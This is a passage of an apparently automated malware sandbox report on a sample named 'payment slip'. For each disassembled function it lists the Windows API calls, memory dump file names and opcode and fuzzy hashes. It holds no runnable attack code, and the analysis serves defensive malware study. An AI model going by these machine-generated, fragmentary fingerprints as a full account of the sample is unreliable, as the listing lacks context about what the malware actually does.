                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                        • String ID:
                                        • API String ID: 1539411459-0
                                        • Opcode ID: edc7891ec052f00dde446346c8cf63ec379dcf9af3cdaf5e558f4776b8ace309
                                        • Instruction ID: 4c6578dbfd07e162e59428d7d0f497ff233421bd74299c0073bec4df52c6f141
                                        • Opcode Fuzzy Hash: edc7891ec052f00dde446346c8cf63ec379dcf9af3cdaf5e558f4776b8ace309
                                        • Instruction Fuzzy Hash: 47F03436041258BBFB126F94AC0AFDE3A69AF0A310F148104FA55654E2CBB95561CBA9
                                        Function 000498B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetSysColor.USER32(00000008), ref: 000498CC
                                        • SetTextColor.GDI32(?,?), ref: 000498D6
                                        • SetBkMode.GDI32(?,00000001), ref: 000498E9
                                        • GetStockObject.GDI32(00000005), ref: 000498F1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Color$ModeObjectStockText
                                        • String ID:
                                        • API String ID: 4037423528-0
                                        • Opcode ID: 5cb8c29fb86a23093ba78e0c05c0857b333fd59d8c3a7904d737c099d0783669
                                        • Instruction ID: 628aa6b61b54e910c8ae05e7aa8acb465dbfc8bb37d02677df2acf93bf791d81
                                        • Opcode Fuzzy Hash: 5cb8c29fb86a23093ba78e0c05c0857b333fd59d8c3a7904d737c099d0783669
                                        • Instruction Fuzzy Hash: 8BE06531644680AEFB215B75FC09FDD3F50AB12335F188219FAFD540E1C77586409B10
                                        Function 0009162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentThread.KERNEL32 ref: 00091634
                                        • OpenThreadToken.ADVAPI32(00000000,?,?,?,000911D9), ref: 0009163B
                                        • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,000911D9), ref: 00091648
                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,000911D9), ref: 0009164F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: CurrentOpenProcessThreadToken
                                        • String ID:
                                        • API String ID: 3974789173-0
                                        • Opcode ID: 92bffd25cada180dfc80503b1cad5ecdeb26fcc0c38be2f68db60df31f79bf83
                                        • Instruction ID: f9f4f9b2c316d5adea1ad48d965a44bd4c3b94c5a0390887efcb700ccdfcb717
                                        • Opcode Fuzzy Hash: 92bffd25cada180dfc80503b1cad5ecdeb26fcc0c38be2f68db60df31f79bf83
                                        • Instruction Fuzzy Hash: FAE08671A01211EBFB601FA0ED0DF863BBDBF44791F184808F249C9090D63C8441C750
                                        Function 0008D858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDesktopWindow.USER32 ref: 0008D858
                                        • GetDC.USER32(00000000), ref: 0008D862
                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0008D882
                                        • ReleaseDC.USER32(?), ref: 0008D8A3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: CapsDesktopDeviceReleaseWindow
                                        • String ID:
                                        • API String ID: 2889604237-0
                                        • Opcode ID: 7acbd3852a6e8d0ae55c1992e12acd7c78773303d435d541c6464406644b24fe
                                        • Instruction ID: 93eb2f004d95c300522832b60da4934074bc92019325bb445303f0b25f063cb2
                                        • Opcode Fuzzy Hash: 7acbd3852a6e8d0ae55c1992e12acd7c78773303d435d541c6464406644b24fe
                                        • Instruction Fuzzy Hash: F2E09AB5800205DFEB51AFA0D90CE6DBBB5FB08311F248459E84AE7260CB399942AF50
                                        Function 0008D86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDesktopWindow.USER32 ref: 0008D86C
                                        • GetDC.USER32(00000000), ref: 0008D876
                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0008D882
                                        • ReleaseDC.USER32(?), ref: 0008D8A3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: CapsDesktopDeviceReleaseWindow
                                        • String ID:
                                        • API String ID: 2889604237-0
                                        • Opcode ID: 0e01f8c79d87e93cd922b491f9152c1281dc116c046972283da04278664986ed
                                        • Instruction ID: 7f89e5ccc6f84e7aff5e8c485d32a4bac17aa66a8d4e455243f01fce0c072ed1
                                        • Opcode Fuzzy Hash: 0e01f8c79d87e93cd922b491f9152c1281dc116c046972283da04278664986ed
                                        • Instruction Fuzzy Hash: 47E092B5800204EFEB51AFA0D90CE6DBBB5BB08311F248459E94AE7260CB3D9902AF50
                                        Function 000A4D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00037620: _wcslen.LIBCMT ref: 00037625
                                        • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 000A4ED4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Connection_wcslen
                                        • String ID: *$LPT
                                        • API String ID: 1725874428-3443410124
                                        • Opcode ID: e9e9a2b677bc93e89a9a6a645bf30d77b3c4c11915a0401ee1c702620b16ecbc
                                        • Instruction ID: bda04ad2adaa8a4db1bee56266379e7962aebe204c873e3c2453f69d09d2b567
                                        • Opcode Fuzzy Hash: e9e9a2b677bc93e89a9a6a645bf30d77b3c4c11915a0401ee1c702620b16ecbc
                                        • Instruction Fuzzy Hash: 17917279900204DFCB55DF94C484EAABBF5BF85304F1580A9E40A9F362C775ED85CB50
                                        Function 0005E27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                        Download Yara Rule
                                        APIs
                                        • __startOneArgErrorHandling.LIBCMT ref: 0005E30D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ErrorHandling__start
                                        • String ID: pow
                                        • API String ID: 3213639722-2276729525
                                        • Opcode ID: 08672c7efe3c13eddd3d3defab04b61c502420c0e2f9849dcbc95a449556b43c
                                        • Instruction ID: aa14851e9872179f7e8414ba1838c67fa90badc1f0b4531e9fc3a1a3de79ea78
                                        • Opcode Fuzzy Hash: 08672c7efe3c13eddd3d3defab04b61c502420c0e2f9849dcbc95a449556b43c
                                        • Instruction Fuzzy Hash: CB519D61A0C20196DB297714CD053BF3BE5EF10746F304DA9E8DA422E9EB358ECD9A42
                                        Function 0004E187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: #
                                        • API String ID: 0-1885708031
                                        • Opcode ID: 8139a65d16e59c826f17e254fc02708281e0847ba5afd8c6c03596315724ccf1
                                        • Instruction ID: 4b426c0fa4738efaa44134e813aed1a59e08195f93fee0c81e9baf77680401ba
                                        • Opcode Fuzzy Hash: 8139a65d16e59c826f17e254fc02708281e0847ba5afd8c6c03596315724ccf1
                                        • Instruction Fuzzy Hash: F25133B5608286DFDB65EF28C481AFE7BE8FF15310F248065EC919B2D1DA749D42CB90
                                        Function 0004F291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        • Sleep.KERNEL32(00000000), ref: 0004F2A2
                                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 0004F2BB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: GlobalMemorySleepStatus
                                        • String ID: @
                                        • API String ID: 2783356886-2766056989
                                        • Opcode ID: 8269c56087a6ef3750c93927d71eb02a90f125cfb3a0e235db23b44436002628
                                        • Instruction ID: d40da941cd1fa1931a34502283d656a13007f71f25524e8682d1c4fea429c9a7
                                        • Opcode Fuzzy Hash: 8269c56087a6ef3750c93927d71eb02a90f125cfb3a0e235db23b44436002628
                                        • Instruction Fuzzy Hash: 5A5127715087489BE321AF10D886BAFBBFCFB84700F81885DF1D991196EB718529CB66
                                        Function 000B5745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                        Download Yara Rule
                                        APIs
                                        • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 000B57E0
                                        • _wcslen.LIBCMT ref: 000B57EC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: BuffCharUpper_wcslen
                                        • String ID: CALLARGARRAY
                                        • API String ID: 157775604-1150593374
                                        • Opcode ID: dbd83e9e8e220f9d433064c28befa7f2a10a91ab2b39c445c973f7d4ed57cd8a
                                        • Instruction ID: b9ee05086f92897da7b830e2bf3258059170e5dec463b456a873347ff041998c
                                        • Opcode Fuzzy Hash: dbd83e9e8e220f9d433064c28befa7f2a10a91ab2b39c445c973f7d4ed57cd8a
                                        • Instruction Fuzzy Hash: 1941A071A001099FCB14DFA9C881AFEBBF5FF59321F244069E505B7252EB749D81CB90
                                        Function 000AD0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _wcslen.LIBCMT ref: 000AD130
                                        • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 000AD13A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: CrackInternet_wcslen
                                        • String ID: |
                                        • API String ID: 596671847-2343686810
                                        • Opcode ID: 123e5246756b3849bbc5950884a6a3f513d05a1794bb89be304ec93c51ce6dfc
                                        • Instruction ID: 7af26448b20abec4088fb160bd28366b322b9231e43e54f01ee38be369d513f9
                                        • Opcode Fuzzy Hash: 123e5246756b3849bbc5950884a6a3f513d05a1794bb89be304ec93c51ce6dfc
                                        • Instruction Fuzzy Hash: CF310C71D00219BBDF15EFA4CC85AEEBFB9FF09300F10401AF815A6166DB35AA56DB60
                                        Function 000C356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON
                                        Download Yara Rule
                                        APIs
                                        • DestroyWindow.USER32(?,?,?,?), ref: 000C3621
                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 000C365C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Window$DestroyMove
                                        • String ID: static
                                        • API String ID: 2139405536-2160076837
                                        • Opcode ID: bd974f8354f0e37be6d32d0abe315338a9f378c64023a40859993e465a6b4171
                                        • Instruction ID: 83b8ac3532a5aeb1a8681e877b2491e899eb91538e3007cb62ea7d52bc67b449
                                        • Opcode Fuzzy Hash: bd974f8354f0e37be6d32d0abe315338a9f378c64023a40859993e465a6b4171
                                        • Instruction Fuzzy Hash: D8318C71110604AAEB149F68DC81FFF73A9FF88720F00D61DF9A997291DA35AD81DB60
                                        Function 000497C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00049BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00049BB2
                                          • Part of subcall function 00049944: GetWindowLongW.USER32(?,000000EB), ref: 00049952
                                        • GetParent.USER32(?), ref: 000873A3
                                        • DefDlgProcW.USER32(?,00000133,?,?,?,?), ref: 0008742D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: LongWindow$ParentProc
                                        • String ID: U
                                        • API String ID: 2181805148-2399391058
                                        • Opcode ID: 570ca7c9010b92ccdb0b4832cab63b64220c9c75f9d630836a94a97eb2bcfcb5
                                        • Instruction ID: 2eeb162618782e77c11e5e41203b6fb16e383eba80f6558e9bbc291a14ecc6af
                                        • Opcode Fuzzy Hash: 570ca7c9010b92ccdb0b4832cab63b64220c9c75f9d630836a94a97eb2bcfcb5
                                        • Instruction Fuzzy Hash: 3421D070604104AFCB21AF2CC848DEA3BD1EF46364F1402B9F9A95B2A2C7718E51E744
                                        Function 000C31EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 000C327C
                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 000C3287
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: Combobox
                                        • API String ID: 3850602802-2096851135
                                        • Opcode ID: 31b02444ded581ba7830288edb353368667840e42cda744f7838bc0c4d184a92
                                        • Instruction ID: a85c1a73ac304b909e9760f2f58543f69bfc76a09c1a887cb7401dc2f09577ae
                                        • Opcode Fuzzy Hash: 31b02444ded581ba7830288edb353368667840e42cda744f7838bc0c4d184a92
                                        • Instruction Fuzzy Hash: 7111D0712102087FFF659F54DC81FBF37AEEB98364F108129F91897290D6719D518760
                                        Function 0009EF10 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 70COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: _wcslen
                                        • String ID: HANDLE$P
                                        • API String ID: 176396367-3695687902
                                        • Opcode ID: 48deb52f5dcb1a1ec2d68bc8dc9d77364c80f45fa2f2292cbd0477775692746a
                                        • Instruction ID: 6a380fd4a750b9a5bdd07a3cbe4e96faea266bbeee26e5066762e655413e1451
                                        • Opcode Fuzzy Hash: 48deb52f5dcb1a1ec2d68bc8dc9d77364c80f45fa2f2292cbd0477775692746a
                                        • Instruction Fuzzy Hash: 30110072520198DAEF28CF14D899BBDB3E8EF80766F60407BE405CE0C4FB709E81A614
                                        Function 000C32A6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: CreateMenuPopup
                                        • String ID: U
                                        • API String ID: 3826294624-2399391058
                                        • Opcode ID: 3a40f77a0fedc5a3bd0b0db8fd41db82f468d8408ac99c7b7ae851b637dc95d0
                                        • Instruction ID: 6330cffe8169eb9095d17e2bb161f137228bc40f7e87cd2def70bc925b12d767
                                        • Opcode Fuzzy Hash: 3a40f77a0fedc5a3bd0b0db8fd41db82f468d8408ac99c7b7ae851b637dc95d0
                                        • Instruction Fuzzy Hash: CB214834608604AFDB61CF28C445FDABBE5FB0A365F08806EE8999B351D331AE42CF51
                                        Function 000C3710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0003600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0003604C
                                          • Part of subcall function 0003600E: GetStockObject.GDI32(00000011), ref: 00036060
                                          • Part of subcall function 0003600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0003606A
                                        • GetWindowRect.USER32(00000000,?), ref: 000C377A
                                        • GetSysColor.USER32(00000012), ref: 000C3794
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                        • String ID: static
                                        • API String ID: 1983116058-2160076837
                                        • Opcode ID: abf9131f3e0fdff12ca912671cab7f62f7493b354140f546fb089c2a54c6bec4
                                        • Instruction ID: 0296f7399c0d75493d78f497b1b87ac7fbf57e18e6f41e88972dea700155053f
                                        • Opcode Fuzzy Hash: abf9131f3e0fdff12ca912671cab7f62f7493b354140f546fb089c2a54c6bec4
                                        • Instruction Fuzzy Hash: CA1129B2610209AFEB11DFA8CC46EEE7BF8FB08314F008619F955E2250D775E9519B50
                                        Function 000C6181 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 000C61FC
                                        • SendMessageW.USER32(?,00000194,00000000,00000000), ref: 000C6225
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: U
                                        • API String ID: 3850602802-2399391058
                                        • Opcode ID: 60dbd06919121168a68c5adb5992daf057fea6f2b884fb90df88ee0c20a6a53d
                                        • Instruction ID: fd7376cd5fe5e6e7a5f0d4eaaef27780c3a86488c11cc761abddb0caf715f126
                                        • Opcode Fuzzy Hash: 60dbd06919121168a68c5adb5992daf057fea6f2b884fb90df88ee0c20a6a53d
                                        • Instruction Fuzzy Hash: 8611C471144614BEEB318F68CD15FFD3BE8EB06315F044119FA169A1E1D3B6DA00DB50
